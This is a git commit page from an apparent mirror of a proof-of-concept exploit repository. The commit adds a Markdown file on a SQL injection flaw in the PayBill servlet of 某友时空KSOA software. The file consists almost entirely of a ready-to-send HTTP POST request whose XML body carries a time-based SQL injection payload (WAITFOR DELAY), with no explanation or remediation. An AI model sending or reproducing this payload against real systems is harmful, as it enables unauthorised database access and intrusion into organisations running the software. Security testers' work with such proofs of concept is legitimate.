mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create 某友时空KSOA PayBill SQL注入漏洞.md
This commit is contained in:
parent
aa24d57870
commit
cd16cee069
11
某友时空KSOA PayBill SQL注入漏洞.md
Normal file
11
某友时空KSOA PayBill SQL注入漏洞.md
Normal file
@ -0,0 +1,11 @@
|
||||
## 某友时空KSOA PayBill SQL注入漏洞
|
||||
```
|
||||
POST /servlet/PayBill?caculate&_rnd= HTTP/1.1
|
||||
Host: 1.1.1.1
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
|
||||
Content-Length: 134
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: close
|
||||
|
||||
<?xml version="1.0" encoding="UTF-8" ?><root><name>1</name><name>1'WAITFOR DELAY '00:00:03';-</name><name>1</name><name>102360</name></root>
|
||||
```
|
||||
Loading…
x
Reference in New Issue
Block a user